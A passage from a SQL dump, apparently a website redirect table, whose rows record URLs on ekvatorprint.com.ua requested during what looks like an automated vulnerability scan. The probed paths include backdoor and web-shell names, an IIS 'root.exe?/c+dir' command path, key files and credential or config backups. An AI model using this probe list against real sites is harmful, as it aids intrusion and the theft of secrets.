00:00:00',301),(8144,'http://ekvatorprint.com.ua/sample.txt',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8145,'http://ekvatorprint.com.ua/sample',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8146,'http://ekvatorprint.com.ua/sample.txt~',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8147,'http://ekvatorprint.com.ua/samples',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8148,'http://ekvatorprint.com.ua/samples/activitysessions',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8149,'http://ekvatorprint.com.ua/samples/activitysessions/',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8150,'http://ekvatorprint.com.ua/samples/',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8151,'http://ekvatorprint.com.ua/sat_admin',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8152,'http://ekvatorprint.com.ua/save',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8153,'http://ekvatorprint.com.ua/scheduler',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8154,'http://ekvatorprint.com.ua/scheduler/',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8155,'http://ekvatorprint.com.ua/scheduler/docs/',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8156,'http://ekvatorprint.com.ua/sbadmin',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8157,'http://ekvatorprint.com.ua/schema.sql',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8158,'http://ekvatorprint.com.ua/screenshots',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8159,'http://ekvatorprint.com.ua/science',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8160,'http://ekvatorprint.com.ua/schema.yml',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8161,'http://ekvatorprint.com.ua/scripts',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8162,'http://ekvatorprint.com.ua/scripts/cgimail.exe',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8163,'http://ekvatorprint.com.ua/scripts/ckeditor/ckfinder/core/connector/aspx/connector.aspx',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8164,'http://ekvatorprint.com.ua/scripts/fpcount.exe',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8165,'http://ekvatorprint.com.ua/scripts/ckeditor/ckfinder/core/connector/asp/connector.asp',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8166,'http://ekvatorprint.com.ua/script',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8167,'http://ekvatorprint.com.ua/scripts/',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8168,'http://ekvatorprint.com.ua/scripts/counter.exe',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8169,'http://ekvatorprint.com.ua/scripts/no-such-file.pl',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8170,'http://ekvatorprint.com.ua/scripts/ckeditor/ckfinder/core/connector/php/connector.php',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8171,'http://ekvatorprint.com.ua/scripts/root.exe?/c+dir',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8172,'http://ekvatorprint.com.ua/scripts/convert.bas',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8173,'http://ekvatorprint.com.ua/scripts/iisadmin/ism.dll?http/dir',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8174,'http://ekvatorprint.com.ua/scripts/tiny_mce',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8175,'http://ekvatorprint.com.ua/scripts/setup.php',NULL,'','',16,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8176,'http://ekvatorprint.com.ua/sdzxadmin',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8177,'http://ekvatorprint.com.ua/scripts/tools/getdrvs.exe',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8178,'http://ekvatorprint.com.ua/scripts/samples/search/webhits.exe',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8179,'http://ekvatorprint.com.ua/scripts/tools/newdsn.exe',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8180,'http://ekvatorprint.com.ua/sdk/',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8181,'http://ekvatorprint.com.ua/search_admin',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8182,'http://ekvatorprint.com.ua/scripts/tinymce',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8183,'http://ekvatorprint.com.ua/search',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8184,'http://ekvatorprint.com.ua/searchreplacedb2.php',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8185,'http://ekvatorprint.com.ua/secret/',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8186,'http://ekvatorprint.com.ua/searchreplacedb2cli.php',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8187,'http://ekvatorprint.com.ua/secret',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8188,'http://ekvatorprint.com.ua/secrets',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8189,'http://ekvatorprint.com.ua/searchresults.php',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8190,'http://ekvatorprint.com.ua/searchresults.html',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8191,'http://ekvatorprint.com.ua/secretadmin',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8192,'http://ekvatorprint.com.ua/searchresults.',NULL,'','',1,0,'2017-01-20 13:29:11','0000-00-00 00:00:00',301),(8193,'http://ekvatorprint.com.ua/secrets/',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8194,'http://ekvatorprint.com.ua/secring.skr',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8195,'http://ekvatorprint.com.ua/section',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8196,'http://ekvatorprint.com.ua/secure.',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8197,'http://ekvatorprint.com.ua/secure',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8198,'http://ekvatorprint.com.ua/secring.bak',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8199,'http://ekvatorprint.com.ua/secring.pgp',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8200,'http://ekvatorprint.com.ua/secure.php',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8201,'http://ekvatorprint.com.ua/secure/downloadFile/',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8202,'http://ekvatorprint.com.ua/secured',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8203,'http://ekvatorprint.com.ua/secure_admin',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8204,'http://ekvatorprint.com.ua/securecleanup',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8205,'http://ekvatorprint.com.ua/secureemail',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8206,'http://ekvatorprint.com.ua/secureadmin',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8207,'http://ekvatorprint.com.ua/security.xml',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8208,'http://ekvatorprint.com.ua/sendmail',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8209,'http://ekvatorprint.com.ua/seoadmin',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8210,'http://ekvatorprint.com.ua/security',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8211,'http://ekvatorprint.com.ua/serial',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8212,'http://ekvatorprint.com.ua/sentemails.log',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8213,'http://ekvatorprint.com.ua/server.cfg',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8214,'http://ekvatorprint.com.ua/serv-u.ini',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8215,'http://ekvatorprint.com.ua/servers',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8216,'http://ekvatorprint.com.ua/service',NULL,'','',1,0,'2017-01-20 13:29:12','0000-00-00 00:00:00',301),(8217,'http://ekvatorprint.com.ua/serveradmin',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8218,'http://ekvatorprint.com.ua/serverindex.xml',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8219,'http://ekvatorprint.com.ua/server.log',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8220,'http://ekvatorprint.com.ua/service.asmx',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8221,'http://ekvatorprint.com.ua/server.xml',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8222,'http://ekvatorprint.com.ua/servlet',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8223,'http://ekvatorprint.com.ua/servlet/ControllerServlet',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8224,'http://ekvatorprint.com.ua/servlet/ErrorReporter',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8225,'http://ekvatorprint.com.ua/servlet/HelloWorldServlet',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8226,'http://ekvatorprint.com.ua/servlet/',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8227,'http://ekvatorprint.com.ua/servlet/Oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8228,'http://ekvatorprint.com.ua/servlet/Oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8229,'http://ekvatorprint.com.ua/servlet/SimpleServlet',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8230,'http://ekvatorprint.com.ua/servlet/HitCount',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8231,'http://ekvatorprint.com.ua/servlet/WebSphereSamples.Configuration.config',NULL,'','',2,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8232,'http://ekvatorprint.com.ua/servlet/SnoopServlet',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8233,'http://ekvatorprint.com.ua/servlet/WebSphereSamples.Form.FormServlet',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8234,'http://ekvatorprint.com.ua/servlet/TheExpiringHTMLServlet',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8235,'http://ekvatorprint.com.ua/servlet/aphtpassword',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8236,'http://ekvatorprint.com.ua/servlet/com.ibm.servlet.engine.webapp.InvokerServlet',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8237,'http://ekvatorprint.com.ua/servlet/WebSphereSamples.YourCo.News.NewsServlet',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8238,'http://ekvatorprint.com.ua/servlet/hello',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8239,'http://ekvatorprint.com.ua/servlet/com.ibm.servlet.engine.webapp.DefaultErrorReporter',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8240,'http://ekvatorprint.com.ua/servlet/com.ibm.servlet.engine.webapp.WebAppErrorReport',NULL,'','',1,0,'2017-01-20 13:29:13','0000-00-00 00:00:00',301),(8241,'http://ekvatorprint.com.ua/servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml',NULL,'','',1,0,'2017-01-20 13:29:14','0000-00-00 00:00:00',301),(8242,'http://ekvatorprint.com.ua/servlet/com.ibm.servlet.engine.webapp.SimpleFileServlet',NULL,'','',1,0,'2017-01-20 13:29:14','0000-00-00 00:00:00',301),(8243,'http://ekvatorprint.com.ua/servlet/snoop',NULL,'','',1,0,'2017-01-20 13:29:14','0000-00-00 00:00:00',301),(8244,'http://ekvatorprint.com.ua/servlet/com.ibm.as400ad.webfacing.runtime.httpcontroller.ControllerServlet',NULL,'','',1,0,'2017-01-20 13:29:14','0000-00-00 00:00:00',301),(8245,'http://ekvatorprint.com.ua/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml',NULL,'','',2,0,'2017-01-20 13:29:14','0000-00-00 00:00:00',301),(8246,'http://ekvatorprint.com.ua/servlet/com.ibm.servlet.engine.webapp.UncaughtServletException',NULL,'','',1,0,'2017-01-20 13:29:14','0000-00-00 00:00:00',301),(8247,'http://ekvatorprint.com.ua/servletcache',NULL,'','',1,0,'2017-01-20 13:29:14','0000-00-00 00:00:00',301),(8248,'http://ekvatorprint.com.ua/session',NULL,'','',1,0,'2017-01-20 13:29:14','0000-00-00 00:00:00',301),(8249,'http://ekvatorprint.com.ua/servletimages',NULL,'','',1,0,'2017-01-20 13:29:14','0000-00-00 00:00:00',301),(8250,'http://ekvatorprint.com.ua/servlet/snoop2',NULL,'','',1,0,'2017-01-20 13:29:14','0000-00-00 00:00:00',301),(8251,'http://ekvatorprint.com.ua/servlets/',NULL,'','',1,0,'2017-01-20 13:29:14','0000-00-00 00:00:00',301),(8252,'http://ekvatorprint.com.ua/session/',NULL,'','',1,0,'2017-01-20 13:29:14','0000-00-00 00:00:00',301),(8253,'http://ekvatorprint.com.ua/settings.html',NULL,'','',1,0,'2017-01-20 13:29:14','0000-00-00 00:00:00',301),(8254,'http://ekvatorprint.com.ua/sessions/',NULL,'','',1,0,'2017-01-20 13:29:14','0000-00-00 00:00:00',301),(8255,'http://ekvatorprint.com.ua/sessions',NULL,'','',1,0,'2017-01-20 13:29:14','0000-00-00 00:00:00',301),(8256,'http://ekvatorprint.com.ua/settings.php',NULL,'','',2,0,'2017-01-20 13:29:14','0000-00-00 00:00:00',301),(8257,'http://ekvatorprint.com.ua/settings',NULL,'','',1,0,'2017-01-20 13:29:15','0000-00-00 00:00:00',301),(8258,'http://ekvatorprint.com.ua/settings.php.save',NULL,'','',1,0,'2017-01-20 13:29:15','0000-00-00 00:00:00',301),(8259,'http://ekvatorprint.com.ua/settings.php.swp',NULL,'','',1,0,'2017-01-20 13:29:15','0000-00-00 00:00:00',301),(8260,'http://ekvatorprint.com.ua/settings/',NULL,'','',1,0,'2017-01-20 13:29:15','0000-00-00 00:00:00',301),(8261,'http://ekvatorprint.com.ua/settings.xml',NULL,'','',1,0,'2017-01-20 13:29:15','0000-00-00 00:00:00',301),(8262,'http://ekvatorprint.com.ua/settings.',NULL,'','',1,0,'2017-01-20 13:29:15','0000-00-00 00:00:00',301),(8263,'http://ekvatorprint.com.ua/settings.php.dist',NULL,'','',1,0,'2017-01-20 13:29:15','0000-00-00 00:00:00',301),(8264,'http://ekvatorprint.com.ua/settings.php.old',NULL,'','',1,0,'2017-01-20 13:29:15','0000-00-00 00:00:00',301),(8265,'http://ekvatorprint.com.ua/settings.php.bak',NULL,'','',1,0,'2017-01-20 13:29:15','0000-00-00 00:00:00',301),(8266,'http://ekvatorprint.com.ua/settings.py',NULL,'','',1,0,'2017-01-20 13:29:15','0000-00-00 00:00:00',301),(8267,'http://ekvatorprint.com.ua/settings.php.txt',NULL,'','',1,0,'2017-01-20 13:29:15','0000-00-00 00:00:00',301),(8268,'http://ekvatorprint.com.ua/settings.php~',NULL,'','',1,0,'2017-01-20 13:29:15','0000-00-00 00:00:00',301),(8269,'http://ekvatorprint.com.ua/share',NULL,'','',1,0,'2017-01-20 13:29:15','0000-00-00 00:00:00',301),(8270,'http://ekvatorprint.com.ua/setup.sql',NULL,'','',1,0,'2017-01-20 13:29:15','0000-00-00 00:00:00',301),(8271,'http://ekvatorprint.com.ua/sftp-config.json',NULL,'','',15,0,'2017-01-20 13:29:15','0000-00-00 00:00:00',301),(8272,'http://ekvatorprint.com.ua/share/',NULL,'','',1,0,'2017-01-20 13:29:15','0000-00-00 00:00:00',301),(8273,'http://ekvatorprint.com.ua/setup.php',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8274,'http://ekvatorprint.com.ua/setup/',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8275,'http://ekvatorprint.com.ua/shared',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8276,'http://ekvatorprint.com.ua/setup',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8277,'http://ekvatorprint.com.ua/sharedadmin',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8278,'http://ekvatorprint.com.ua/shell',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8279,'http://ekvatorprint.com.ua/shellz.php',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8280,'http://ekvatorprint.com.ua/shell/',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8281,'http://ekvatorprint.com.ua/shop-admin',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8282,'http://ekvatorprint.com.ua/shop',NULL,'','',2,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8283,'http://ekvatorprint.com.ua/shop_admin',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8284,'http://ekvatorprint.com.ua/shopadmin.php',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8285,'http://ekvatorprint.com.ua/shopadmin1.php',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8286,'http://ekvatorprint.com.ua/shopadmin',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8287,'http://ekvatorprint.com.ua/shopadmin.',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8288,'http://ekvatorprint.com.ua/shopadmin1.',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8289,'http://ekvatorprint.com.ua/shopadmin7963',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8290,'http://ekvatorprint.com.ua/shopaffadmin.',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8291,'http://ekvatorprint.com.ua/shopaffadmin.php',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8292,'http://ekvatorprint.com.ua/shopcustadmin.',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8293,'http://ekvatorprint.com.ua/showadmin',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8294,'http://ekvatorprint.com.ua/shopping',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8295,'http://ekvatorprint.com.ua/show',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8296,'http://ekvatorprint.com.ua/shopcustadmin.php',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8297,'http://ekvatorprint.com.ua/showCfg',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8298,'http://ekvatorprint.com.ua/showthread',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8299,'http://ekvatorprint.com.ua/showallsites',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8300,'http://ekvatorprint.com.ua/shradmin',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8301,'http://ekvatorprint.com.ua/sign-in/',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8302,'http://ekvatorprint.com.ua/sibstatus',NULL,'','',1,0,'2017-01-20 13:29:16','0000-00-00 00:00:00',301),(8303,'http://ekvatorprint.com.ua/signin.html',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8304,'http://ekvatorprint.com.ua/signin.',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8305,'http://ekvatorprint.com.ua/signin.htm',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8306,'http://ekvatorprint.com.ua/signin.php',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8307,'http://ekvatorprint.com.ua/signin.pl',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8308,'http://ekvatorprint.com.ua/signin.jsp',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8309,'http://ekvatorprint.com.ua/signin.cgi',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8310,'http://ekvatorprint.com.ua/signin.py',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8311,'http://ekvatorprint.com.ua/signin.rb',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8312,'http://ekvatorprint.com.ua/signin.shtml',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8313,'http://ekvatorprint.com.ua/signin/',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8314,'http://ekvatorprint.com.ua/signup',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8315,'http://ekvatorprint.com.ua/signin/oauth/',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8316,'http://ekvatorprint.com.ua/simple.jsp',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8317,'http://ekvatorprint.com.ua/simple',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8318,'http://ekvatorprint.com.ua/signup.action',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8319,'http://ekvatorprint.com.ua/simple-backdoor.php',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8320,'http://ekvatorprint.com.ua/simpleFormServlet',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8321,'http://ekvatorprint.com.ua/simpapp',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8322,'http://ekvatorprint.com.ua/simpledad',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8323,'http://ekvatorprint.com.ua/site-admin',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8324,'http://ekvatorprint.com.ua/simpleJSP',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8325,'http://ekvatorprint.com.ua/site/common.xml',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8326,'http://ekvatorprint.com.ua/site.txt',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8327,'http://ekvatorprint.com.ua/site-log/',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8328,'http://ekvatorprint.com.ua/site',NULL,'','',1,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8329,'http://ekvatorprint.com.ua/site.sql',NULL,'','',3,0,'2017-01-20 13:29:17','0000-00-00 00:00:00',301),(8330,'http://ekvatorprint.com.ua/site_admin',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8331,'http://ekvatorprint.com.ua/site_map',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8332,'http://ekvatorprint.com.ua/siteadmin/index.',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8333,'http://ekvatorprint.com.ua/siteadmin/index.php',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8334,'http://ekvatorprint.com.ua/siteadmin',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8335,'http://ekvatorprint.com.ua/siteadmin/login.php',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8336,'http://ekvatorprint.com.ua/siteadmin/login.',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8337,'http://ekvatorprint.com.ua/siteadmin/login.html',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8338,'http://ekvatorprint.com.ua/sitemap',NULL,'','',19,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8339,'http://ekvatorprint.com.ua/sitedown.',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8340,'http://ekvatorprint.com.ua/sitedown.php',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8341,'http://ekvatorprint.com.ua/sites',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8342,'http://ekvatorprint.com.ua/skin',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8343,'http://ekvatorprint.com.ua/sites/all/modules/fckeditor',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8344,'http://ekvatorprint.com.ua/sites.ini',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8345,'http://ekvatorprint.com.ua/siteserver/publishing/viewcode.',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8346,'http://ekvatorprint.com.ua/skin1_admin.css',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8347,'http://ekvatorprint.com.ua/siteserver/publishing/viewcode.php',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8348,'http://ekvatorprint.com.ua/sites/all/libraries/fckeditor',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8349,'http://ekvatorprint.com.ua/skins',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8350,'http://ekvatorprint.com.ua/slanadmin',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8351,'http://ekvatorprint.com.ua/slapd.conf',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8352,'http://ekvatorprint.com.ua/skin_admin',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8353,'http://ekvatorprint.com.ua/sloth_admin.php',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8354,'http://ekvatorprint.com.ua/sloth_admin.',NULL,'','',1,0,'2017-01-20 13:29:18','0000-00-00 00:00:00',301),(8355,'http://ekvatorprint.com.ua/smarty',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8356,'http://ekvatorprint.com.ua/smartadmin',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8357,'http://ekvatorprint.com.ua/smilies',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8358,'http://ekvatorprint.com.ua/snapshot',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8359,'http://ekvatorprint.com.ua/snoop/',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8360,'http://ekvatorprint.com.ua/snoop',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8361,'http://ekvatorprint.com.ua/snoop2',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 